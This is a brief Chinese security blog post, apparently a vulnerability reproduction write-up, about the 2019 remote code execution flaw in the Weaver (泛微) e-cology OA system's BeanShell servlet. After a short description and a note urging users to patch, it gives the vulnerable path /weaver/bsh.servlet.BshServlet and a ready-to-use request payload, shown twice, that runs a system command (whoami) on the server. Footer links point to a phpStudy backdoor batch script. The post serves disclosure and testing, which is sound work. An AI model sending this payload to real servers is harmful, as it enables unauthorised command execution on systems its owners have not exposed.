泛微E-cology OA远程代码执行漏洞0day 复现/POC

2019年9月19日，泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令，目前该漏洞安全补丁已发布，请使用泛微e-cology OA系统的用户尽快采取防护措施。

复现

漏洞路径：/weaver/bsh.servlet.BshServlet

bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

1	bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

标签：0day , POC , 漏洞原文连接：泛微E-cology OA远程代码执行漏洞0day 复现/POC 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

opencanary_web：一个开源的Linux蜜罐框架 phpStudy后门RCE，复现/批量脚本/修复